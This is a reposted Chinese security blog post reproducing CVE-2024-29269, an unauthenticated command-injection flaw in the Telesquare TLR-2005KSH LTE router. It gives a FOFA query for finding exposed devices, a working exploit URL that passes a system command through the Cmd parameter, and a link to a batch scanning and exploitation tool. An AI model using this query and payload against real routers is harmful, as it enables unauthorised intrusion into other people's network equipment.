CVE-2024-29269__TLR-2005KSH_RCE复现 附批量扫描

admin 2024年4月13日14:16:15评论40 views字数 745阅读2分29秒阅读模式

CVE-2024-29269__RCE

CVE-2024-29269__TLR-2005KSH_RCE复现 附批量扫描

TLR-2005KSH介绍

TLR-2005KSH 是一款LTE路由器产品,通过无线连接到LTE无线网络来支持有线数据通信。

.通过无线LTE <-> 有线互联网自动节省(故障转移)通过WAN端口和LTE支持互联网冗余。.LTE和WCDMA无线冗余支持。.POS、LTE备份可在付款断开时实现连续的互联网连接。.4个LAN Potter支持允许与PC和笔记本电脑的额外连接。.DC5V-12V电源支持和保险丝安装,防止产品因过电压而损坏。.提供端口转发、过滤器、DMZ/超级DMZ等路由器功能。.远程控制,远程固件管理工具提供远程维护。.VPN 客户端提供的VPN功能。 

CVE-2024-29269__TLR-2005KSH_RCE复现 附批量扫描

FOFA

title="Login to TLR-2005KSH"

漏洞复现

漏洞描述:

Telesquare Tlr-2005Ksh是韩国Telesquare公司的一款Sk Telecom Lte路由器。Telesquare TLR-2005Ksh版本1.0.0和1.1.4存在未经授权的远程命令执行漏洞。 攻击者可以利用该漏洞通过Cmd参数执行未经授权的系统命令,并获取服务器权限。

影响版本:

TLR-2005Ksh 1.0.0 和 1.1.4    

漏洞复现:

/cgi-bin/admin.cgi?Command=sysCommand&Cmd=pwd

CVE-2024-29269__TLR-2005KSH_RCE复现 附批量扫描

批量扫描/利用:

工具仅用于安全测试,任何非法攻击本人概不负责

工具仅用于安全测试,任何非法攻击本人概不负责

https://github.com/YongYe-Security/CVE-2024-29269

存在漏洞会打印并保存在result.txt

CVE-2024-29269__TLR-2005KSH_RCE复现 附批量扫描

CVE-2024-29269__TLR-2005KSH_RCE复现 附批量扫描

原文始发于微信公众号(YongYe 安全实验室):CVE-2024-29269__TLR-2005KSH_RCE复现 附批量扫描

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月13日14:16:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-29269__TLR-2005KSH_RCE复现 附批量扫描https://cn-sec.com/archives/2654355.html

发表评论

匿名网友 填写信息